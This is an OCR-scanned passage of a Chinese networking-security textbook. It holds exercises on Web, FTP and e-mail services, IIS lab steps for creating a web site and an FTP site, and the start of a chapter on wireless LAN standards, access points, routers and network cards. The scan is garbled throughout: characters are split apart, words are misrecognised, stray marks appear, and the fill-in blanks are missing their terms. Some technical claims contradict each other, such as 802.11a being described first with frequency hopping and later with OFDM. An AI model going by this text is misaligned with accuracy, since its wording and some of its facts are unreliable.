用 户 应 该 在 Web 浏览 器 的 地 址 栏 中 输入 以 访问 这 个 Web 网 站 。 

4. 在 创建 Web 网 站 时 ,需要 为 其 设 定 一 个 目录, 默认 时 网 站 中 的 所 有 资源 
都 存放 在 这 个 目录 中 。 

5. 利用 协议 , 用 户 可 以 将 远程 计算 机 上 的 文件 下 载 到 自己 计算 机 的 磁盘 中 ， 
也 可 以 将 自己 的 文件 上 传 到 远程 计算 机 上 。 

6. 在 一 台 计算 机 上 建立 多 个 Web 站 点 的 方法 有 : 利用 多 个 利用 多 个 TCP 
端口 和 利用 多 个 主机 头 名 称 。 

7. 用 户 使 用 协议 从 电子 邮件 服务 器 那里 获取 电子 邮件 。 

8. 在 配置 FTP 站 点 时 ， 为 了 使 用 户 可 以 通过 完全 合格 域名 访问 站 点 ， 应 该 在 网 络 中 
配置 服务 器 。 

9. 目前 ， 应 用 于 互联 网 上 的 流 媒 体 发 布 方式 主要 有 : 单 播 、 广 播 、 播 和 点 
播 等 四 种 方式 。 


10. 为 了 便于 对 站 点 资源 进行 灵活 管理 ， 还 可 以 把 文件 存放 在 本 地 计算 机 的 其 他 文件 
夹 中 或 者 其 他 计算 机 的 共享 文件 夹 中 ， 然 后 再 把 这 个 文件 夹 映射 到 站 点 主 目录 中 的 一 个 


目录 上 。 

二 、 选 择 题 

1. 目前 建立 Web 服务 器 的 方法 主要 有 : (  ). 
A.IIS B. URL C. SMTP D. DNS 

2. 用 户 将 文件 从 FTP 服务 器 复制 到 自己 计算 机 的 过 程 ， 称 为 ( ). 
A. 上 传 B. 下 载 C. 共享 D. 打印 


3. ( ”) 的 FIP 服 务 器 不 要 求 用 户 在 访问 它们 时 提供 用 户 账户 和 密码 。 
A. 匿名 B. 独立 C. 共享 D. 专用 
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4. ”如 果 希 望 在 用 户 访问 网 站 时 ， 若 没有 指定 具体 的 网 页 文档 名 称 时 ， 也 能 为 其 提供 
一 个 网 页 ， 那 么 需要 为 这 个 网 站 设置 一 个 默认 网 页 ， 这 个 网 页 往往 被 称 为 ( )。 


A. 链接 B. 首页 C. 映射 D. 文档 
5 广 ) 协 议 用 于 发 送 电子 邮件 。 
A. HTTP B. POP3 C. SMTP D. FTP 
6. 用 户 在 访问 Web 资源 时 需要 使 用 统一 的 格式 进行 访问 ， 这 种 格式 被 称 为 (。”)。 
A. 物理 地 址 B.IP 地 址 C. 邮箱 地 址 D. 统一 资源 定位 符 
7. 流 媒 体 技术 主要 用 于 : ( )、 现 场 点 播 和 视频 会 议 。 
A. 远程 教育 B. 名 称 解析 C. 路 由 D. 邮件 传输 


8. ”Internet 是 世界 上 最 大 、 履 盖 范 围 最 广 的 计算 机 网 络 ， 它 采用 ( ”) 协 议 ， 将 全 世 
界 不 同 国家 、 不 同 地 区 、 不 同 部 门 和 不 同 结构 的 计算 机 、 国 家 骨干 网 、 广 域 网 、 局 域 网 ， 
通过 网 络 互联 设备 连接 在 一 起 。 


A. TCP/IP B. AppleTalk C. NetBEUI D. IPX/SPX 
9. 在 FTP 服务 器 上 建立 (  )， 向 用 户 提 供 可 以 下 载 的 资源 。 

A. DHCP 中 继 代 理 B. 作用 域 

C.FTP 站 点 D. 主要 区 域 


10. 对 于 一 个 网 站 而 言 ， 可 以 把 所 有 网 页 及 相关 文件 都 存放 在 网 站 的 主 目录 中 ， 也 就 
是 在 主 目录 中 建立 子 文件 夹 ， 然 后 把 文件 放置 在 这 些 子 文件 夹 内 ， 这 些 文件 夹 被 称 为 


( ). 
A. 实际 目录 B. 虚拟 目录 C.URL D. SMTP 
11. 用 户 将 自己 计算 机 的 文件 资源 复制 到 FTP 服务 器 上 的 过 程 ， 称 为 ( )。 
A. 上 传 B. 下 载 C. 共享 D. 打印 


12. 每 一 个 使 用 电子 邮件 系统 的 用 户 都 需要 有 属于 自己 的 ( 。 )， 它 代表 了 电子 邮箱 
所 在 。 
A. 物理 地 址 B.IP 地 址 
C. 电子 邮件 地 址 D. 统一 资源 定位 符 
13.， 仅 为 特定 用 户 提供 资源 的 FTP 服务 器 被 称 为 “(  ” )FTP 服务 器 ”， 用 户 要 想 成 
为 它 的 合法 用 户 ， 必 须 经 过 该 服务 器 管理 员 的 允许 ， 由 管理 员 为 用 户 分 配 一 个 用 户 账户 和 
密码 ， 然 后 用 户 使 用 这 个 用 户 账 户 和 密码 访问 服务 器 ， 否 则 将 无 法 访问 。 


A. 匿名 B. 独立 C. 共享 D. 专用 
14. ( ” ) 协 议 用 于 接收 电子 邮件 。 
A. HTTP B. POP3 C. SMTP D. FTP 
15. 用 户 在 FTP 客户 机 上 可 以 使 用 (  ”) 下 载 FTP 站 点 上 的 内 容 。 
A. UNC 路 径 B. 浏览 器 C. 网 上 邻居 D. 网 络 驱 动 器 
16. 搭建 邮件 服务 器 的 方法 有 : ( )、Exchange Server、Winmail 等 。 
A.IIS B. URL C. SMTP D. DNS 


17. FTP 服务 实际 上 就 是 将 各 种 类 型 的 文件 资源 存放 在 ( 。”) 服 务 器 中 ,用 户 计 算 机 上 
需要 安装 一 个 FTP 客户 端的 程序 ， 通 过 这 个 程序 实现 对 文件 资源 的 访问 。 
A. HTTP B. POP3 C.SMTP D. FTP 
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18. 建立 FTP 服务 器 的 主要 方法 有 : IIS 和 (  ). 


A.DNS B. RealMedia C. Serv-U D. SMTP 

三 、 判 断 题 

1. Internet 提供 的 主要 信息 服务 有 : WWW 服务 、FTP 服务 、E-mail 服务 、Telnet 服 
务 、 信 息 讨论 与 公布 服务 、 娱 乐 与 会 话 服务 等 。 EE， 

2. 默认 时 ，Web 网 站 不 允许 任何 卫 地 址 的 计算 机 来 访问 它 。 C 订 

3. FTP 服务 只 能 使 用 TCP 端口 21。 E 

4. ”管理 员 可 以 设置 让 FTP 站 点 允许 或 拒绝 某 台 特定 计算 机 或 某 一 组 计算 机 来 访问 该 
FTP 站 点 中 的 文件 。 ( ) 


5. 一 个 URL 的 格式 为 : “信息 服务 类 型 : // 信 息 资源 地 址 /文件 路 径 ”。 《 - 
6. Web 网 站 中 的 所 有 资源 都 必须 存储 在 主 目录 中 ， 用 户 无 法 访问 位 于 主 目录 之 外 的 


网 页 资源 。 C3 
7. 在 FIP 服务 器 上 可 以 建立 多 个 FIP 站 点 ,向 不 同 的 用 户 分 别提 供 可 以 下 载 的 资源 。 

( ”3 

8. 使 用 IIS 可 以 搭建 代理 服务 器 。 ( ) 


9. Intemet 是 世界 上 最 大 、 履 盖 范 围 最 广 的 计算 机 网 络 。 它 采用 IPX/SPX 协议 , 将 全 
世界 不 同 国家 、 不 同 地 区 、 不 同 部 门 和 不 同 结构 的 计算 机 、 国 家 骨干 网 、 广 域 网 、 局 域 网 ， 
通过 网 络 互联 设备 连接 在 一 起 。 ( ) 
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1. 实验 目的 
解 常用 的 网 络 应 用 服务 的 种 类 ， 掌 握 IS 信息 服务 中 的 Web 服务 器 的 安全 架设 。 


2， 实 验 内 容 

在 计算 机 上 利用 IS 创建 一 个 Web 网 站 。 其 中 ， 网 站 名 称 为 “web1”; 网 站 使 用 的 中 
地 址 为 :192.168.0.1、 端 口号 为 :， 9000、 没 有 主机 头 ， 使 用 D 分 区 的 “resource” 文 件 夹 作 
为 该 站 点 的 主 目录 、 人 允许 匿名 访问 ， 并 且 分 配 “ 浏 览 ” 的 访问 权限 。 

3， 实 验 步 

步骤 1: 在 计算 机 上 启动 “IIS 管理 器 ”， 展 开本 地 计算 机 ， 右 击 “ 网 站 ”， 在 快捷 菜 
单 中 单 击 “ 新 建 ” 一 “网 站 ”。 

步骤 2: 在 出 现 “欢迎 使 用 网 站 创建 向 导 ” 画 面 时 ， 单 击 “ 下 一 步 ”按钮 。 

步骤 3: 在 “网 站 描述 ”对 话 框 中 输入 : web1， 然 后 单 击 “ 下 一 步 ” 按 钮 。 

步骤 4: 在“ 耳 地址 和 端口 设置 ”中 的 “网 站 卫 地 址 ”处 输入 : 192.168.0.1 ， 在 “网 
站 TCP 端口 (默认 值 : 80)” 处 输入 : 9000， 然 后 单 击 “下 一 步 ” 按 钮 。 

步骤 $: 在 “网 站 主 目录 ”对 话 框 中 输入 : D:\resource， 选 中 “人 允许 匿名 访问 网 站 ” 复 
选 枉 ， 然 后 单 击 “ 下 一 步 ” 按 钮 。 
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步骤 6: 在 “网 站 访问 权限 ”对 话 框 中 ， 除 了 保留 默认 的 权限 外 ， 还 需要 选择 浏览 权 
限 ， 然 后 单 击 “ 下 一 步 ” 按 钮 。 
步骤 7: 在 出 现 “已 成 功 完成 网 站 创建 向 导 ” 画 面 时 ， 单 击 “ 完 成 ”按钮 。 


实 训 二 ”FTP 服务 器 的 安全 架设 


1. 实验 目的 
了 解 常用 的 网 络 应 用 服务 的 种 类 ， 掌 握 HS 信息 服务 中 的 FTP 服务 器 的 安全 架设 。 
2. 实验 内 容 


在 计算 机 上 利用 IS 创建 一 个 FTP 站 点 。 其 中 ， 站 点 名 称 为 “FTP1”; 站 点 使 用 的 正 
地 址 为 : 192.168.1.1、 端 口号 为 : 8080、 不 隔离 用 户 ; 使 用 DD 分 区 的 “software” 文 件 夹 作 
为 该 站 点 的 主 目录 、 人 允许 “ 读 取 ”和 “ 写 入 ”的 访问 权限 。 

3. 实验 步骤 

步骤 1: 在 计算 机 上 启动 “IIS 管理 器 ”， 展 开本 地 计算 机 ， 右 击 “FTP 站 点 ”， 在 快 
捷 菜单 中 单 击 “新 建 ” 一 “FTP 站 点 ”。 

步骤 2: 在 出 现 “ 欢 迎 使 用 FTP 站 点 创建 向 导 ” 画 面 时 ， 单 击 “ 下 一 步 ” 按 钮 。 

步骤 3: 在 “FTP 站 点 描述 ”对 话 框 中 输入 该 网 站 的 描述 文字 : FTP1， 然 后 单 击 “ 下 

步骤 4: 在 “了 P 地址 和 端口 设置 ”对 话 框 中 的 “输入 此 FTP 站 点 使 用 的 他 地 址 ”处 选 
定 这 个 站 点 使 用 的 下 地 址 : 192.168.1.1, 在 “输入 FTP 站 点 的 TCP 端口 (默认 值 =21)” 处 
设置 这 个 站 点 使 用 的 TCP 端口 号 ，8080， 然 后 单 击 “ 下 一 步 ” 按 钮 。 

步骤 5: 在 “FTP 用 户 隔离 ”对 话 框 中 选择 : 不 隔离 用 户 ， 然 后 单 击 “ 下 一 步 ” 按 钮 。 

步骤 6: 在 “FTP 站 点 主 目录 ”对 话 框 中 为 这 个 站 点 的 主 目 录 指 定 文 件 夹 : D:esource， 
然后 单 击 “ 下 一 步 ”按钮 。 

步骤 7: 在 “FTP 站 点 访问 权限 ”中 ， 选 择 读 取 和 写 入 。 然 后 ， 单 击 “ 下 一 步 ” 按 钮 。 

步骤 8: 在 出 现 “ 已 成 功 完成 FTP 站 点 创建 向 导 ” 夯 面 时 ， 单 击 “ 完 成 ”按钮 。 
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第 9 章 无 线 网络 安 全 
【本 章 要 点 】 
本 章 通过 对 与 无 线 网 络 相关 的 安全 技术 进行 详细 的 介绍 ， 使 学 生 对 无 线 网 络 安全 有 一 


个 较 全 面 的 认识 。 通 过 本 章 的 学 习 ， 学 生 可 以 掌握 无 线 网 络 的 基础 知识 ， 了 解 无 线 网 络 常 
见 的 安全 问题 ， 掌 握 WEP 技术 在 无 线 网 络 的 应 用 及 无 线 VPN 的 配置 。 


9.1 无 线 网 络 技术 概述 


所 谓 的 无 线 网 络 (Wireless LAN/WLAN)， 是 指 用 户 以 电脑 通过 区 域 空间 的 无 线 网 卡 
(Wireless Card/PCMCIA 卡 ， 结 合 存 取 桥 接 器 (Access Point) 进 行 区 域 无 线 网 络 连接 ， 再 加 上 
一 组 无 线 上 网 拨 接 账号 ， 即 可 上 网 进行 网 络 资源 的 利用 。 

简单 地 说 ， 无 线 局 域 网 与 一 般 传 统 的 以 太 网 络 (Ethemet) 的 概念 并 没有 多 大 的 差异 ， 只 
是 无 线 局 域 网 将 用 户 端 接 取 网 络 的 线路 传输 部 分 转变 成 无 线 传输 的 形式 ， 但 是 却 具备 有 线 
网 络 缺 乏 的 行动 性 ， 然 而 之 所 以 称 其 是 局 域 网 ， 则 是 因为 会 受到 桥接 器 与 电脑 之 间距 离 的 
远近 限制 而 影响 传输 范围 ， 所 以 必须 要 在 区 域 范 围 内 才 可 以 连 上 网 络 。 


9.1.1 无 线 局 域 网 的 优势 


若 与 有 线 网 络 比较 的 话 ， 无 线 局 域 网 的 速度 还 是 慢 了 许多 ， 但 无 线 的 便利 性 等 种 种 优 
点 ， 相 信 还 是 会 吸引 到 许多 企业 与 家 庭 用 户 的 使 用 ， 整 体 来 看 ， 无 线 局 域 网 包括 下 列 几 点 
优势 。 

(1) 无 线 局 域 网 不 再 受 限 于 网 络 可 连 线 端点 数 的 多 寡 ， 就 可 轻松 地 在 无 线 局 域 网 中 增 
加 新 的 使 用 者 数目 。 

(2) 使 用 无 线 局 域 网 时 不 必 受 限于 网 络 线 的 长 短 与 揪 槽 ， 节 省 有 线 网 络 布线 的 人 力 与 
物力 成 本 ， 从 此 摆脱 被 网 络 线 纠缠 的 梦 帮 。 

(3) 相 较 于 时 下 流行 的 GPRS 手机 与 CDMA 手机 , 无 线 局 域 网 具有 高 速 宽频 上 网 的 特 
性 ， 它 可 提供 11Mb/s, 约 200 倍 于 一 般 调 制 解 调 器 (Modem 56Kbps) 的 传输 速度 ， 可 满足 使 
者 对 大 量 的 图 像 、 影 音 传 输 的 需求 。 

(4) 对 于 上 班 族 与 经 常 需要 离开 办 公 座 位 开会 的 主管 人 员 来 说 ， 使 用 无 线 局 域 网 就 可 
不 用 再 担心 找 不 到 上 网 的 插座 。 此 外 ， 透 过 无 线 局 域 网 ， 使 用 者 可 以 在 信号 涵盖 的 范围 内 ， 
用 笔记 本 电脑 等 设备 ， 可 以 随时 随地 的 与 网 络 保持 连接 。 

(5) 除了 “无 线 ” 可 以 免 去 实体 网 络 线 布线 的 困扰 之 外 ， 另 外 ， 在 网 络 发 生 错误 的 时 
候 ， 也 不 用 慢 慢 寻找 出 损坏 的 线路 ， 只 要 检查 讯号 发 送 与 接收 端的 讯号 是 否 正常 即 可 。 

由 以 上 无 线 局 域 网 所 具有 的 种 种 优点 来 看 ， 无 线 局 域 网 不 仅 可 以 成 为 有 线 局 域 网 的 再 
延伸 ， 更 具有 相当 高 的 可 靠 性 。 在 不 久 的 将 来 ， 取 代 有 线 局 域 网 成 为 人 们 上 网 的 主要 方式 ， 
改变 人 们 对 于 网 络 的 使 用 习惯 。 
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9.1.2 无 线 局 域 网 规格 标准 


为 了 让 无 线 局 域 网 技术 能 够 被 广 为 使 用 ， 这 些 技 术 必 须要 建立 一 种 业界 标准 ， 以 确保 
各 厂商 生产 的 设备 都 能 具有 相 容 性 与 稳定 性 。 这 些 标准 是 由 美国 下 EE( 电 机 电子 工程 师 协 
会 ，The Institute of Electrical and Electronics Engineers) 所 制定 的 ， 最 早 的 规格 是 传输 速度 为 
2Mb/s 的 IEEE 802.11， 于 1997 年 6 月 所 提出 ， 接 着 在 1999 年 9 月 又 提出 了 传输 速度 为 
54Mb/s 的 IEEE 802.11a 和 传输 速度 为 11Mb/s 的 IEEE 802.11b， 以 下 分 别 介绍 无 线 局 域 网 
的 主要 规格 标准 。 


1. 802.11b 规格 


802.11b 又 称 为 802.11HR(High Rate), 其 使 用 2.4GHz 的 频段 , 采用 直接 序列 展 频 技术 ， 
传输 资料 的 传送 速度 可 达到 11Mb/s， 传 输 距离 可 远 到 100 米 甚至 更 远 ， 是 目前 市 面 上 大 多 
数 无 线 网 络 产品 使 用 的 标准 。 

2. 802.11a 规格 

802.11a 使 用 5.2GHz 的 频段 ， 采 用 跳 频 展 频 技术 ， 传 送 资料 的 传送 速度 较 快 可 以 达到 
54Mb/s， 传 送 距离 则 可 达到 50 米 。 

由 于 先前 的 无 线 局 域 网 标准 802.11b， 其 传输 速度 只 有 11Mb/s， 无 法 传输 声音 与 影像 
等 大 量 资料 ， 故 802.11a 被 认为 是 下 一 代 无 线 局 域 网 传输 的 标准 ， 并 吸引 国内 外 许多 大 厂 
争 相 推出 相关 的 无 线 网 络 产品 ， 但 其 市 场 何 时 可 成 熟 并 广 为 消 费 大 众 与 企业 接受 ， 则 有 待 
802.11a 的 桥接 器 与 网 卡 价格 降低 而 定 。 

未 来 到 底 那 一 个 规格 会 在 如 此 激烈 竞争 的 市 场 中 出 线 成 为 主流 ， 则 取决 于 使 用 者 本 身 
的 需求 。 以 802.11a 具备 更 高 频 宽 的 特性 ， 适 用 于 处 理 大 量 资料 ， 如 影音 信息 的 传递 ， 或 
使 用 人 数 剧 增 的 公众 无 线 传输 服务 等 当然 是 最 主要 的 选择 ， 但 是 对 于 一 般 上 网 使 用 者 ， 采 
用 802.11b 系统 即 具备 足够 的 速度 ， 青 加 上 其 大 众 化 的 价格 更 是 吸引 人 ， 消 费 者 可 依 自身 
的 需求 与 预算 来 决定 应 该 购买 何 种 商品 。 

3. HyperLAN 规格 

相 较 于 802.11a， 发 展 较 晚 的 欧洲 标准 HyperLAN， 是 由 欧洲 的 欧洲 通信 标准 协会 
ETSI(The European Telecommunications Standards Institute) 在 BRAN(Broadband Radio Access 
Networks) 所 制定 的 ， 在 欧洲 设置 455MHz 的 频 宽 使 用 。 

HyperLAN 的 技术 是 采用 在 SGHz 上 传输 ， 并 可 用 不 同 速度 进行 ， 最 快 可 达到 54Mb/s， 
于 其 是 采用 OFDM 技术 ， 所 以 不 仅 可 以 在 室外 传送 ， 就 连 在 室内 有 许多 阻碍 物 亦 可 用 多 
EE 路 径 的 方式 来 传送 ， 通 常 室内 覆盖 半径 可 达 30 米 ， 户 外 可 达到 150 米 。 

4. 蓝牙 (Bluetooth) 技 术 


蓝牙 是 一 种 可 在 短 距离 之 内 ， 以 低 功率 及 低 成 本 传送 资料 的 无 线 传输 标准 ， 并 确保 不 
同 三 商 所 制造 的 设备 能 彼此 相互 沟通 使 用 ， 同 时 此 传输 介质 必须 能 兼 具 语音 及 数据 通信 
能 力 。 


相信 大 多 数 的 人 都 不 知道 ， 其 实 蓝牙 这 个 名 词 的 由 来 是 源 自 欧洲 中 世纪 一 位 名 叫 
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Harald Bluetooth 丹麦 国王 的 名 字 ， 丹 麦 国王 为 何 会 和 无 线 传输 技术 牵扯 上 关系 呢 ? 原因 是 
这 位 名 为 Harald Bluetooth 的 丹麦 国王 一 生 致力 于 协调 丹麦 与 挪威 之 间 的 纷争 ,最 后 统一 瑞 
、 芬 兰 、 丹 麦 ， 并 在 北欧 历史 上 留 下 不 朽 的 英名 。 人 们 就 将 新 一 代 的 无 线 传输 技术 命名 
为 “蓝牙 ”， 希 望 能 够 透 过 蓝牙 的 技术 ， 将 每 个 厂商 所 生产 的 设备 都 用 统一 的 标准 将 各 项 
配备 相互 连接 。 

蓝牙 使 用 2.4 GHz 之 高 频传 输 ， 该 频段 在 世界 各 国都 属于 共享 的 频谱 ， 没 有 干扰 的 问 
题 ， 因 此 全 球 通用 。 此 外 ,运用 蓝牙 技术 的 传输 器 ， 可 以 与 一 般 WAN 或 Intemet 做 数据 资 
料 、 语 音 的 接 取 、 沟 通 ， 且 各 项 终端 产品 也 可 透 过 蓝牙 技术 彼此 沟通 连接 。 


9.1.3 无 线 网 络 设备 


1. 无 线 AP 

无 线 AP(AP，Access Point， 无 线 访问 结 点 、 会 话 点 或 存 取 桥接 器 ) 是 一 个 包含 很 广 的 
名 称 ， 它 不 仅 包 含 单纯 性 无 线 接 入 点 (无 线 AP)， 也 同样 是 无 线 网 关 、 无 线 网 桥 等 类 设备 的 
统称 ， 如 图 9-1 所 示 。 


9-1 WAP54G 无 线 AP 


各 种 文章 或 厂家 在 面 对 无 线 AP 时 的 称呼 目前 比较 混乱 ， 但 随 着 无 线路 由 器 的 普及 ， 
目前 的 情况 下 如 没有 特别 的 说 明 ， 我 们 一 般 还 是 只 将 所 称呼 的 无 线 AP 理解 为 单纯 性 无 线 
AP， 以 示 和 无 线路 由 器 加 以 区 分 。 它 主要 是 提供 无 线 工 作 站 对 有 线 局 域 网 和 从 有 线 局 域 网 
对 无 线 工 作 站 的 访问 , 在 访问 接 入 单 击 覆 盖 范 围 内 的 无 线 工 作 站 可 以 通过 它 进 行 相互 通信 。 

单纯 性 无 线 AP 就 是 一 个 无 线 的 交换 机 ， 仅 仅 是 提供 一 个 无 线 信 号 发 射 的 功能 。 单 纯 
性 无 线 AP 的 工作 原理 是 将 网 络 信号 通过 双 绞 线 传送 过 来 , 经 过 AP 产品 的 编译 , 将 电信 号 
转换 成 为 无 线 电 信号 发 送出 来 ， 形 成 无 线 网 的 覆盖 。 根 据 不 同 的 功率 ， 其 可 以 实现 不 同 程 
度 、 不 同 范围 的 网 络 覆 盖 ， 一 般 无 线 AP 的 最 大 覆盖 距离 可 达 300 米 。 

多 数 单纯 性 无 线 AP 本 身 不 具备 路 由 功能 ， 包 括 DNS、DHCP、Firewall 在 内 的 服务 器 
功能 都 必须 有 独立 的 路 由 或 是 计算 机 来 完成 ,目前 大 多 数 的 无 线 AP 都 支持 多 用 户 (30 一 100 
台 计 算 机 ) 接 入 、 数 据 加 密 、 多 速率 发 送 等 功能 ， 在 家 庭 、 办 公 室 内 ， 一 个 无 线 AP 便 可 实 
现 所 有 计算 机 的 无 线 接 入 。 

单纯 性 无 线 AP 亦 可 对 装 有 无 线 网 卡 的 计算 机 做 必要 的 控制 和 管理 。 单 纯 性 无 线 AP 既 
可 以 通过 10BASE-T(WAN) 端 口 与 内 置 路 由 功能 的 ADSL MODEM 或 CABLE MODEM(CM) 
直接 相连 ， 也 可 以 在 使 用 时 通过 交换 机 /集线器 、 宽 带路 由 器 再 接 入 有 线 网 络 。 

无 线 AP 跟 无 线路 由 器 类 似 ， 按 照 协议 标准 本 身 来 说 IEEE 802.11b 和 IEEE 802.11g 的 
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羡 范 围 是 室内 100 米 、 室 外 300 米 。 这 个 数值 仅 是 理论 值 ， 在 实际 应 用 中 ， 会 碰 到 各 种 
障碍 物 ， 其 中 以 玻璃 、 木 板 、 石 谨 墙 对 无 线 信 号 的 影响 最 小 ， 而 混凝土 墙壁 和 铁 对 无 线 信 
号 的 屏蔽 最 大 。 所 以 通常 实际 使 用 范围 是 : 室内 30 米 、 室 外 100 米 (没有 障碍 物 )。 

因此 ， 作 为 无 线 网 络 中 重要 的 环节 无 线 接 入 单 击 、 无 线 网 关 也 就 是 无 线 
AP(Access Point)， 它 的 作用 其 实 就 类 似 于 我 们 常用 的 有 线 网 络 中 的 集线器 。 在 那些 需要 大 
量 AP 来 进行 大 面积 覆盖 的 公司 使 用 得 比较 多 , 所 有 AP 通过 以 太 网 连接 起 来 并 连 到 独立 的 
无 线 局 域 网 防火 墙 。 但 同时 由 于 其 一 般 专用 无 线 AP 都 不 带 额 外 的 局 域 网 接口 ， 使 其 应 用 
范围 较 窄 。 

2. 无 线路 由 器 

无 线路 由 器 : 就 是 带 有 无 线 履 盖 功 能 的 路 由 器 ， 它 主要 应 用 于 用 户 上 网 和 无 线 获 盖 。 
市 场 上 流行 的 无 线路 由 器 一 般 都 支持 专线 xdsl、cable、 动 态 xdsl 和 pptp 四 种 接 入 方式 ， 它 
还 具有 其 他 一 些 网 络 管理 的 功能 ， 如 DHCP 服务 、NAT 防火 墙 、MAC 地 址 过 滤 等 功能 ， 
如 图 9-2 所 示 。 
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9-2 TP-LinkTL-WR841N 无 线路 由 器 


无 线路 由 器 (Wireless Router) 好 比 将 单纯 性 无 线 AP 和 宽带 路 由 器 合 二 为 一 的 扩展 型 产 
品 ， 它 不 仅 具备 单纯 性 无 线 AP 所 有 功能 如 支持 DHCP 客户 端 、 支持 VPN、 防 火 墙 、 支 持 
WEP 加 密 等 , 而 且 还 包括 了 网 络 地 址 转换 INAT) 功 能 ,可 支持 局 域 网 用 户 的 网 络 连接 共享 。 
可 实现 家 庭 无 线 网 络 中 的 Intemet 连接 共享 ， 实 现 ADSL 和 小 区 宽带 的 无 线 共享 接 入 。 

无 线路 由 器 可 以 与 所 有 以 太 网 接 的 ADSL MODEM 或 CABLE MODEM 直接 相连 ， 也 
可 以 在 使 用 时 通过 交换 机 /集线器 、 宽 带路 由 器 等 局 域 网 方式 再 接 入 。 其 内 置 有 简单 的 虚拟 
拨号 软件 ， 可 以 存储 用 户 名 和 密码 拨号 上 网 ， 可 以 实现 为 拨号 接 入 Internet 的 ADSL、CM 
等 提供 自动 拨号 功能 ， 而 无 需 手 动 拨号 或 占用 一 台 计 算 机 做 服务 器 使 用 。 此 外 ， 无 线路 由 
器 一 般 还 具备 相对 更 完善 的 安全 防护 功能 。 

此 外 ， 大 多 数 无 线路 由 器 还 包括 一 个 4 个 端口 的 交换 机 ， 可 以 连接 n 台 使 用 有 线 网 卡 
的 计算 机 ， 从 而 实现 有 线 和 无 线 网 络 的 顺利 过 渡 。 

在 接 入 速度 上 ， 目 前 符合 11Mb/s、54Mb/s、108Mb/s 的 无 线路 由 器 产品 缘 有 。 

无 线路 由 器 适合 于 ADSL、CM 猫 等 设备 。 无 线路 由 器 将 多 种 设备 合 而 为 一 ， 亦 比较 
适合 于 初次 建 网 的 用 户 ， 其 集成 化 的 功能 可 以 使 用 户 只 用 一 个 设备 而 满足 所 有 的 有 线 和 无 

3. 无 线 网 卡 


无 线 网 卡 是 终端 无 线 网 络 的 设备 ， 是 无 线 局 域 网 的 无 线 获 盖 下 通过 无 线 连接 网 络 进行 
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上 网 使 用 的 无 线 终端 设备 。 具 体 来 说 无 线 网 卡 就 是 使 你 的 电脑 可 以 利用 无 线 来 上 网 的 一 个 
装置 ， 但 是 有 了 无 线 网 卡 也 还 需要 一 个 可 以 连接 的 无 线 网 络 ， 如 果 你 在 家 里 或 者 所 在 地 有 
无 线路 由 器 或 者 无 线 AP 的 覆盖 ， 就 可 以 通过 无 线 网 卡 以 无 线 的 方式 连接 无 线 网 络 可 上 网 。 

1) “无 线 网 卡 标准 上 区 分 

无 线 网 卡 按 无 线 标准 可 定 为 IEEE 802.11b、IEEE 802.11a、IEEE 802.11g。 

在 频段 上 来 说 802.11a 标准 为 5.8GHz 频段 ，802.11b、802.11g 标准 为 2.4GHz 频段 。 
从 传输 速率 上 来 说 802.11b 使 用 了 DSSS( 直 接 序列 扩 频 ) 或 CCK( 补 码 键 控 调制 )， 传 输 速率 
为 11Mb/s, 而 802.11g 和 802.11a 使 用 相同 的 OFDM( 正 交 频 分 复 用 调制 ) 技 术 , 使 其 传输 速 
率 是 b 的 5 倍 ， 也 就 是 54Mb/s。 

兼容 上 来 说 802.11a 不 兼容 802.11b， 但 是 可 以 兼容 802.11g， 而 802.11g 和 802.11b 两 
种 标准 可 以 相互 兼容 使 用 ， 但 在 使 用 时 仍 需 注意 ，802.11g 的 设备 在 802.11b 的 网 络 环境 下 
使 用 只 能 使 用 802.11b 标准 ， 其 数据 数 率 只 能 达到 11Mb/s。 

2) ”无 线 网 卡 接口 上 区 分 

无 线 网 卡 按照 接口 的 不 同 可 以 分 为 多 种 。 

一 种 是 台式 机 专用 的 PCI 接口 无 线 网 卡 ， 如 图 9-3 所 示 。 


9-3 ”台式 机 专用 的 PCI 接口 无 线 网 卡 
一 种 是 笔记 本 电脑 专用 的 PCMICA 接口 网 卡 ， 如 图 9-4 所 示 。 
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图 9-4 笔记 本 电脑 专用 的 PCMICA 接口 网 卡 


一 种 是 USB 无 线 网 卡 ， 这 种 网 卡 不 管 是 台式 机 用 户 还 是 笔记 本 用 户 ， 只 要 安装 了 驱动 
程序 ， 都 可 以 使 用 。 在 选择 时 只 需要 单 击 就 可 以 ， 只 有 采用 USB2.0 接口 的 无 线 网 卡 才能 
满足 802.11g 或 802.11g+ 的 需求 ， 如 图 9-5 所 示 。 
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图 9-5 USB 无 线 网 卡 


3) 无线 网 卡 网 络 制式 上 区 分 

无 线 上 网 卡 是 目前 无 线 广 域 通信 网 络 应 用 广泛 的 上 网 介质 。 目 前 ， 由 于 我 国 只 有 中 国 
移动 的 GPRS 和 中 国联 通 的 CDMA (1X) 两 种 网 络 制 式 ， 所 以 常见 的 无 线 上 网 卡 就 包括 
CDMA 无 线 上 网 卡 和 GPRS 无 线 上 网 卡 两 类 。 另 外 还 有 一 种 CDPD 无 线 上 网 卡 。 

1. CDMA 无 线 上 网 卡 

CDMA(Code Division Multiple Access, 码 分 多 址 ) 无 线 上 网 卡 是 针对 中 国联 通 的 CDMA 
网 络 推出 来 的 上 网 连接 设备 。CDMA 允许 所 有 的 使 用 者 同时 使 用 全 部 频带 ， 并 且 把 其 他 使 
用 者 发 出 的 信号 视 为 杂音 ， 完 全 不 必 考 虑 到 信和 号 碰撞 (collision) 的 问题 。 

2. GPRS 无 线 上 网 卡 


GPRS 上 网 卡 是 针对 中 国 移动 的 GPRS 网 络 推出 来 的 无 线 上 网 设备 。 GPRS 的 英文 全 称 
为 “General Packet Radio Service”， 中 文 含义 为 “通用 分 组 无 线 服 务 ”， 它 是 利用 “ 包 交 
换 ”(Packet-Switched) 的 概念 所 发 展 出 的 一 套 无 线 传 输 方式 。 所 谓 的 包 交 换 就 是 将 Date 封 
装 成 许多 独立 的 封包 ， 再 将 这 些 封 包 一 个 一 个 传送 出 去 ， 形 式 上 有 单 击 类 似 寄 包 庄 ， 采 用 
包 交 换 的 好 处 是 只 有 在 有 资料 需要 传送 时 才 会 占用 频 宽 ， 而 且 可 以 以 传输 的 资料 量 计价 ， 
这 对 用 户 来 说 是 比较 合理 的 计 费 方式 , 因为 像 Intemet 这 类 的 数据 传输 大 多 数 的 时 间 频 宽 是 
闲置 的 。 

相对 原来 GSM 的 拨号 方式 的 电路 交换 数据 传送 方式 , GPRS 是 分 组 交换 技术 , 具有 “ 实 
时 在 线 ”、“ 按 量 计 费 ”、“ 快 捷 登 录 ”、“ 高 速 传输 ”、“ 自 如 切换 ”的 优点 。 


9.2 无 线 网 络 的 安全 问题 


